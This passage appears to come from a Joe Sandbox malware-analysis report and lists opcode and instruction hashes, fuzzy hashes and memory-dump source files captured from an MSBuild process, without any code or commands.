                                                                                                                                                                                                                                                • Instruction ID: 1c451dd19f1b7c06d4ef6f1b6d5a06354d232503faaad8b515a15ea0795bac6f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dfd970979b8ac0d7de91f5132d173a96eacc85d8c19a412d7a13cc2829ba9cc1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76C08035B50014CFCB14C748E8045E87775FB89719B0500A2D606C7260D725E8158F81
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: ce726cd648f223a84a2fcf535e89e922855401925c1c24bbc57019bbfc2b9bd0
                                                                                                                                                                                                                                                • Instruction ID: 35b85f4b446835f672d56665ff1222ccf71313e7c14f8bfe91db20bb8239d03d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce726cd648f223a84a2fcf535e89e922855401925c1c24bbc57019bbfc2b9bd0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76D012757400009FCB08DB98E4005E833B5DFC5625B0100A5E206CBA71CB319C958BD1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: dc7667cddef0e10d423ccda8594c337257ef78961d9f670b91162c2a79c416cf
                                                                                                                                                                                                                                                • Instruction ID: 0e43e0d175cf7f6fef705934586add2212f912ef1b12b195a4f94ca64e5cf974
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc7667cddef0e10d423ccda8594c337257ef78961d9f670b91162c2a79c416cf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7D0C96115C3D56FE7029361A4503817B24EF47390F1987CBD1848B5A3E6189986C765
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9ff79fb942d2f49bdf5b4ab83b4416355b1951bd883ee39749cd5ff6f8b72f40
                                                                                                                                                                                                                                                • Instruction ID: 270e084413619ab67f7ed226dc795c70305d42f4e112355a148a7fa316541fa3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ff79fb942d2f49bdf5b4ab83b4416355b1951bd883ee39749cd5ff6f8b72f40
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E1D01271D0E34CAFD315DBA99815415FF7CEF0B200B0442DAED888B266E579985087E2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 73fdba7248d951d8858ffcfa11ec04272a31cbf71bc3fd616cff33dcbbf929e2
                                                                                                                                                                                                                                                • Instruction ID: 41bcebcf99d2b3496db625269ad64746ab3473b69b729ad5852861c5f33bcd01
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 73fdba7248d951d8858ffcfa11ec04272a31cbf71bc3fd616cff33dcbbf929e2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43D0C7919193E14FC7076B7574280B53F60BB7220271606C7D4808B553C62C4B05D751
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9acd6e1189c73de43a60e0edc7b976b28bc08ded5eece904b1d9a093252d6217
                                                                                                                                                                                                                                                • Instruction ID: 5b87ee453fc185a47cef105f6245c62a82caba22f8c0c3b80d3fb7241fd9bb13
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9acd6e1189c73de43a60e0edc7b976b28bc08ded5eece904b1d9a093252d6217
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 71D012E361D3C0BFC3068324C8945847FA1DF62304F3A4992C240C2153D36454158715
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd